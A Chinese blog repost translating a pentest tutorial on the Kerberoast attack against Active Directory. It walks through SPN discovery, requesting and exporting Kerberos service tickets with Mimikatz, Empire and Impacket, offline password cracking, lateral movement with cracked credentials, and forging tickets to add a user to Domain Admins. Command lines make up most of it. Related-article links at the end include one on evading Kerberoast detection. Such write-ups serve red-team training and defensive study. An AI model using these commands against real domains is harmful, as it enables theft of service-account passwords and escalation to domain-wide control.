Kerberoast

最新推荐文章于 2024-03-11 17:17:57 发布
最新推荐文章于 2024-03-11 17:17:57 发布
阅读量270 收藏
点赞数
原文链接:http://blog.51cto.com/maxvision/2129920
版权

原文:https://pentestlab.blog/2018/06/12/kerberoast/amp/
描述Kerberos和Active Directory如何使用服务主体名称(SPNs)的优秀文章:http://adsecurity.org/?page_id=183
Active Directory服务主体名称(SPNs)的全面参考(尽可能全面):http://adsecurity.org/?page_id=183
××× Kerberos service tickets 的5个步骤:

  1. SPN Discovery
  2. Request Service Tickets
  3. Export Service Tickets
  4. Crack Service Tickets
  5. Rewrite Service Tickets & RAM Injection

(一)SPN Discovery
原文:https://pentestlab.blog/2018/06/04/spn-discovery/

SetSPN
SetSPN是一个本机windows二进制文件,可用于检索用户帐户和服务之间的映射。该实用程序可以添加、删除或查看SPN注册。
PS C:\> setspn -T medin -Q /

GetUserSPNs
Tim Medin开发了PowerShell脚本,该脚本是kerberoast toolkit的一部分,并且可以查询AD(活动目录),以便只发现与用户帐户相关联的服务,因为与SetSPN相比,这种方法更加专注。
meterpreter > powershell_import /root/Desktop/GetUserSPNs.ps1
也可以执行vbs脚本。
C:\Users\Administrator>cscript.exe GetUserSPNs.vbs
https://github.com/nidem/kerberoast

PowerShell AD Recon
Sean Metcalf的脚本用于查询活动目录,以获得诸如Exchange、Microsoft SQL、Terminal等有趣的服务。下面的脚本将识别网络上的所有Microsoft SQL实例。
meterpreter > powershell_import /root/Discover-PSMSSQLServers.ps1
meterpreter > powershell_execute Discover-PSMSSQLServers
还可以使用PSMSExchangeServers脚本发现Microsoft Exchange服务。
meterpreter > powershell_import /root/Discover-PSMSExchangeServers.ps1
meterpreter > powershell_execute Discover-PSMSExchangeServers
服务帐户的枚举很重要,因为这些帐户可能配置为弱密码。PasswordLastSet和LastLogon的属性可能指示哪些服务更有可能使用了弱密码。
meterpreter > powershell_import /root/Find-PSServiceAccounts.ps1
meterpreter > powershell_execute Find-PSServiceAccounts
https://github.com/PyroTek3/PowerShell-AD-Recon

Empire
PowerShell Empire还拥有一个模块,可以显示用于域帐户的服务主体名称(SPN)。
(Empire: xx) > usemodule situational_awareness/network/get_spn
(Empire: powershell/situational_awareness/network/get_spn) > info
https://pentestlab.blog/2018/05/28/situational-awareness/

PowerShellery
在向Empire添加Get-SPN模块之前,Scott Sutherland已经创建了几个Powershell脚本,它们是PowerShellery的一部分,可以为各种服务收集SPN。其中一些需要用PowerShell v2.0,其他一些用PowerShell v3.0。
PS C:\> Import-Module .\Get-SPN.psm1
PS C:\> Get-SPN -type service -search ""
结果也可以转化为表格,以便更轻松地映射帐户和服务。
Get-SPN -type service -search "" -List yes | Format-Table
还有一个额外的脚本可以获取UserSid,服务和实际用户。
PS C:\> Import-Module .\Get-DomainSpn.psm1
PS C:\> Get-DomainSpn
https://github.com/nullbind/Powershellery

Impacket
使用python版本的GetUserSPNs(这是impacket的一部分),还可以从非连接域系统中发现服务主体名称。但是,与活动目录通信需要有效的域凭证,因为不能使用基于令牌的身份验证。
#./GetUserSPNs.py -dc-ip 10.0.0.1 pentestlab.local/test
https://github.com/CoreSecurity/impacket

参考:
https://adsecurity.org/?p=230
https://adsecurity.org/?p=1508
http://adsecurity.org/?page_id=183
https://github.com/nullbind/Powershellery
https://github.com/PyroTek3/PowerShell-AD-Recon

(二)Request Service Tickets
使用PowerShell是请求指定SPN的服务票证最简单的方法,正如Tim Medin在DerbyCon 4.0上的说的。
PS > Add-Type -AssemblyName System.IdentityModel
PS > New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"
执行klist命令将列出所有可用的缓存票据。
PS > klist

请求服务票据的另一种解决方案是通过Mimikatz指定服务主体名称作为目标。
mimikatz#kerberos::ask /target:PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80
与klist类似,内存中存在的Kerberos票证列表可以通过Mimikatz检索。从现有的PowerShell会话中,Invoke-Mimikatz脚本将输出所有票据。
PS > Invoke-Mimikatz -Command '"kerberos::list"'
mimikatz(powershell)#kerberos::list

另外,加载Kiwi模块将添加一些额外的Mimikatz命令,它们可以执行相同的任务。
meterpreter > load kiwi
meterpreter > kerberos_ticket_list
或者通过执行一个自定义的Kiwi命令。
meterpreter > kiwi_cmd kerberos::list

Impacket有一个python模块,可以请求属于域用户的Kerberos服务票据,与计算机帐户服务票据相比,这些票据应该更容易破解。然而,从一个不属于该域的系统与Active Directory交互还需要有效的域凭据。
#./GetUserSPNs.py -request pentestlab.local/test
https://github.com/CoreSecurity/impacket

弱密码服务票据的识别也可以使用由Matan Hart开发的RiskySPN中的模块。此模块的目的是对属于用户的可用服务票据进行审计,以便根据用户帐户和密码过期查找最容易包含弱密码的票据。与klist和Mimikatz相比,该脚本将提供更详细的输出,包括用户组信息、密码年龄和破解窗口。
PS > Find-PotentiallyCrackableAccounts -FullData -Verbose
使用-Domain参数执将返回所有具有关联服务主体名称的用户帐户。
PS > Find-PotentiallyCrackableAccounts -Domain "pentestlab.local"
服务票据信息也可以以CSV格式导出,以供离线查看。
PS > Export-PotentiallyCrackableAccounts
另一个脚本可以通过其SPN为服务实例获取服务票据。
meterpreter > power_shell
PS > Get-TGSCipher -SPN "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"
https://github.com/cyberark/RiskySPN

Tim Medin的Kerberoast toolkit为了实现过程的自动化已经被重写。AutoKerberoast包含Tim的原始脚本,包括两个PowerShell脚本,其中包含可以执行以Base64、John和Hashcat格式请求、列出和导出服务票据的各种功能。
meterpreter > powershell_execute List-UserSPNs
还有一个-Domain参数可以只列出特定域的SPNs。
meterpreter > powershell_execute List-UserSPNs -Domain "pentestlab.local"
https://github.com/nidem/kerberoast
https://github.com/xan7r/kerberoast

(三)Export Service Tickets
Mimikatz是可以导出Kerberos服务票据的标准工具。从PowerShell会话中,以下命令将列出内存中的所有可用票据,并将其保存在远程主机中。
PS > Invoke-Mimikatz -Command '"kerberos::list /export"'

同样,PowerShell Empire有一个模块可以自动完成Kerberos服务票据提取任务。
(Empire: xx) > usemodule credentials/mimikatz/extract_tickets
该模块将使用Invoke-Mimikatz函数自动执行下面的命令。
mimikatz(powershell)#standard::base64
mimikatz(powershell)#kerberos::list /export

支持Kerberos身份验证的服务的票证哈希可以直接使用PowerShell Empire模块提取。哈希的格式可以提取为John或Hashcat。该模块将检索所有服务帐户的密码哈希值。
(Empire: agent) > interact xx
(Empire: xx) > usemodule credentials/invoke_kerberoast

AutoKerberoast将以base64格式提取所有的服务票据。
meterpreter > powershell_execute Invoke-AutoKerberoast
AutoKerberoast中还有一个脚本(https://github.com/xan7r/kerberoast/blob/master/autokerberoast_noMimikatz.ps1) ,它将以hashcat兼容格式显示提取的票据。
https://github.com/xan7r/kerberoast

使用更具针对性的Kerberoasting也可以提取属于特定域的elevated groups的票据。
PS > Invoke-AutoKerberoast -GroupName "Domain Admins" -Domain pentestlab.local -HashFormat John
https://github.com/xan7r/kerberoast

Matan Hart开发的Get-TGSCipher PowerShell模块可以以三种不同格式:John、Hashcat和Kerberoast提取服务票据的密码散列。可以在(一)SPN Discovery 中检索脚本所需的相关服务的服务主体名称。使用Get-TGSCipher函数的好处是无需使用Mimikatz导出票据,这可能会触发蓝色团队的警报,并且还可以通过获取散列来直接减少将票据转换为John格式的步骤。
PS > Get-TGSCipher -SPN "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80" -Format John

(四)Crack Service Tickets
tgsrepcrack.py是Tim Medin开发的Kerberoast中的一部分,可以通过提供密码列表来破解Kerberos票据。
#python tgsrepcrack.py /root/Desktop/passwords.txt PENTESTLAB_001.kirbi
https://github.com/nidem/kerberoast

Lee Christensen开发了extractServiceTicketParts python脚本,该脚本可以使用Go语言提取服务票据和tgscrack的哈希,从而可以破解哈希,密码将以纯文本显示。如果PowerShell remoting已开启,则可以使用从服务票据中检索的密码执行远程命令和其他横向移动操作。
PS > Enable-PSRemoting
PS > $pass = 'Password123' | ConvertTo-SecureString -AsPlainText -Force
PS > $creds = New-Object System.Management.Automation.PSCredential -ArgumentList 'PENTESTLAB_001', $pass
PS > Invoke-Command -ScriptBlock {get-process} -ComputerName WIN-PTELU2U07KG.PENTESTLAB.LOCAL -Credential $creds
https://github.com/leechristensen/tgscrack

(五)Rewrite Service Tickets & RAM Injection
Kerberos tickets使用密码的NTLM hash进行签名。如果ticket hash已经被破解,那么可以使用kerberos python脚本重写该票据。这种策略将允许在访问服务时模拟任何域用户或假帐户。此外,还可以将用户添加到一个elevated group中进行提权,如Domain Admins。
#python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -u 500
#python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -g 512
可以使用以下Mimikatz命令将新票据重新注入内存,以便通过Kerberos协议对目标服务执行身份验证。
kerberos :: ptt PENTESTLAB.kirbi
https://github.com/nidem/kerberoast

参考:
https://github.com/nidem/kerberoast
https://github.com/xan7r/kerberoast
https://github.com/cyberark/RiskySPN
https://github.com/leechristensen/tgscrack
http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
https://adsecurity.org/?p=2293
https://www.blackhillsinfosec.com/a-toast-to-kerberoast/
https://blog.xpnsec.com/kerberos-attacks-part-1/
https://www.cyberark.com/blog/service-accounts-weakest-link-chain/

转载于:https://blog.51cto.com/maxvision/2129920

weixin_33815613
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PyPI 官网下载 | kerberoast-0.0.7-py3-none-any.whl
02-08
资源来自pypi官网,解压后可用。 资源全名:kerberoast-0.0.7-py3-none-any.whl
kerberoast
iteye_16188的博客
11-26 246
项目地址:[url]https://github.com/nidem/kerberoast[/url] kerberoast是用来攻击微软Kerberos的实现。 [code="java"]PS C:> setspn -T medin -Q /[/code] 使用window自带攻击提取SPN user [code="java"]PS C:> Add-Type -AssemblyNam...
内网渗透(二) | 域渗透之Kerberoast攻击
Ms08067安全实验室
05-09 2945
Kerberoast攻击kerberoast攻击发生在kerberos协议的TGS_REP阶段,关于kerberos协议详情,传送门:内网渗透 | 域内认证之Kerberos协议详解Ke...
Kerberoast 工具集--查找域下的SPN--GetUserSPNs
rv0p111
10-02 1466
代码如下所示 # Edits by Tim Medin # File: GetUserSPNS.ps1 # Contents: Query the domain to find SPNs that use User accounts # Comments: This is for use with Kerberoast https://github.com/nidem/kerberoast...
高级域渗透技术之再谈Kerberoast攻击
systemino的博客
05-05 1341
Rebeus是一个用C#编写Kerberos 滥用工具包,最初是由@gentilkiwi编写的Kekeo工具包中的一个端口,这个工具包从那时起就在不断发展。要了解更多关于 Rubeus 的信息,请查看"从 Kekeo 到 Rubeus"这篇文章后续的"Rubeus ——Now With More keo"或最近修订的Rubeus README.md。 我最近对 Rubeus 做了一些改进...
kerberoast:Kerberoast攻击-纯python-
05-03
kerberoast Kerberos攻击工具包-纯python- 安装 pip3 install kerberoast 前提条件 Python 3.6参见requirements.txt 对于急躁的人 重要说明:LDAP和Kerberos可接受的目标URL格式如下<ldap> : <protocol>+<auth>:/...
Kerberoast检测:Kerberoast检测脚本
02-09
用于自动创建Kerberos服务帐户的Honey凭证: ... 为了避免出现误报检测,您可以创建一个服务帐户蜜罐来检测非洲菊苣: 要求:-生成SPN工件,以检测在嘈杂的环境中出现的角化现象-此powershell脚本应由具有创建Active ...
使用修改后的KDC选项和加密类型绕过Kerberoast检测.zip
03-23
使用修改后的KDC选项和加密类型绕过Kerberoast检测
Kerberoasting攻击
无心的博客
09-28 3072
前面我们介绍了《Windows本地认证》、《Windows网络认证》、《Windows域认证》和《SPN扫描》,这次继续讲解域内相关的东西。 0x01介绍 当发布Windows 2000和Active Directory时,微软打算在 Windows NT 和Windows 95 上也支持Active Directory,这意味着不仅会产生各种各样的安全问题也会导致更多不安全的配置方式。同时,也意...
内网渗透:详解kerberoast攻击
A_991128a的博客
07-29 465
上篇文章介绍了kerberos的协议的认证流程以及可能出现的安全问题,也简要说了一下kerberoast攻击,本篇文章就具体介绍一下kerberoasting具体原理以及如何进行操作。关于内网相关的文章已经发了两篇了,大家感兴趣的话可以找以前的文章看一下,后面会继续出关于内网方面的知识。内网渗透:Kerberos认证协议安全性分析内网横移:抓取域管理员密码首先再来回顾一下Kerberoast协议的认证过程。kerberoast认证过程算上PAC可以说有四个个阶段。如下图所示。
域渗透-Kerberoasting服务票据爆破
good good study
03-28 2751
Kerberoast攻击,就是攻击者为了获取目标服务的访问权限,而设法破解Kerberos服务票据并重写它们的过程。这是红队当中非常常见的一种攻击手法,因为它不需要与服务目标服务进行任何交互,并且可以使用合法的活动目录访问来请求和导出可以离线破解的服务票据,以获取到最终的明文密码。之所以出现这种情况,是因为服务票据使用服务帐户的散列(NTLM)进行加密,所以任何域用户都可以从服务转储散列,而无需将shell引入运行该服务的系统中。
全网最详细 | Kerberos协议详解
Ms08067安全实验室
02-27 7033
目录Kerberos基础PAC特权属性证书1. PAC结构2. PAC凭证信息3. PAC签名4. KDC验证PAC5. PAC在kerberos中的优缺点Kerberos实验AS-REQ & AS-REP1. AS-REQ请求包分析2. AS-REP回复包分析 (1) TGT认购权证 (2) Lo...
深入理解 Kerberoasting 攻击
最新发布
qq_31812157的博客
03-11 576
是一种允许攻击者窃取使用RC4加密的KRB_TGS票证的技术,以暴力破解应用程序服务HASH来获取其密码Kerberos使用所请求服务的NTLM哈希来加密给定服务主体名称 (SPN) 的KRB_TGS票证。当域用户向域控制器KDC发送针对已注册SPN的任何服务的TGS 票证请求时,KDC会生成KRB_TGS攻击者可以离线使用例如hashcat来暴力破解服务帐户的密码,因为该票证已使用服务帐户的NTLM 哈希进行了加密。Kerberoasting攻击主要步骤如下1.发现SPN服务。
域渗透 | kerberos认证及过程中产生的攻击
st3pby的博客
02-20 7026
Windows认证一般包括本地认证(NTLM HASH)和域认证(kerberos)。认证的原理网上有很多文章。如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课本篇文章主要内容是Kerberos认证过程中产生的攻击。Kerberos是由麻省理工学院提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。Kerberos协议有两个基础认证模块:和,以及微软扩展的两个认证模块S4U和PAC。kerberos是一种基于票据的认证方式。
域攻击策略
weixin_30807779的博客
05-24 1212
https://adsecurity.org/?p=2362 Attack Methods for Gaining Domain Admin Rights in Active Directory ActiveDirectorySecurity,Microsoft Security,Technical Reference bySean Metcalf There ar...
域渗透-kerberoast Attack
a3320315的博客
05-31 710
攻击简介 过程: 查询SPN,找到有价值的SPN,需要满足以下条件: 1、该SPN注册在域用户帐户(Users)下 2、域用户账户的权限很高 3、请求TGS 4、导出TGS 5、暴力破解 SETSPN setspn -A HOST/AD.test.com test #给账号申请SPN 机器:AD.test.com 帐号:test 服务:HOST 若有些服务有端口,则可以直接这样写: setspn -A HTTP/AD.test.com:80 test setspn -
域渗透之SPN服务主体名称
谢公子的博客
01-21 2580
目录 SPN SPN的配置 SetSPN 注册SPN 查询SPN SPN的扫描 PowerShell-AD-Recon GetUserSPNs.ps1 GetUserSPNs.vbs PowerView.ps1 PowerShellery SPN SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)的...
内网安全:Kerberoasting攻击和SPN服务
god_Zeo的安全博客
05-27 1927
0x01 SPN SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)的唯一标识符。 SPN是服务器上所运行服务的唯一标识,每个使用Kerberos的服务都需要一个SPN Kerberos认证过程使用SPN将服务实例与服务登录账户相关联,如果想使用 Kerberos 协议来认证服务,那么必须正确配置SPN。如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPN SPN分为两种,一种注册在AD上机器帐户(Compu
Kerberoast攻击的另一种姿势
weixin_34293911的博客
09-20 208
本文讲的是Kerberoast攻击的另一种姿势,大约在两年前,Tim Medin提出了一种新的攻击技术,他称之为“Kerberoasting”。尽管在这种攻击技术发布时我们还没有意识到其全部的含义,但这种攻击技术已经改变了我们的交战游戏。最近,Kerberoasting受到越来越多的关注,@mubix发布了以Kerberoasting为主题的三篇连载系列...
用hashcat破译hash密码
weixin_43558339的博客
05-16 520
在cmd进入hashcat所在文件夹,使用如下命令。 已知结果为8字节字母加数字。密文内容在sha1.txt里面。 .\hashcat64.exe -m 100 -a 3 --force sha1.txt "?l?l?l?l?l?l?d?d?d" 在hashcat.potfile里找hash结果
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值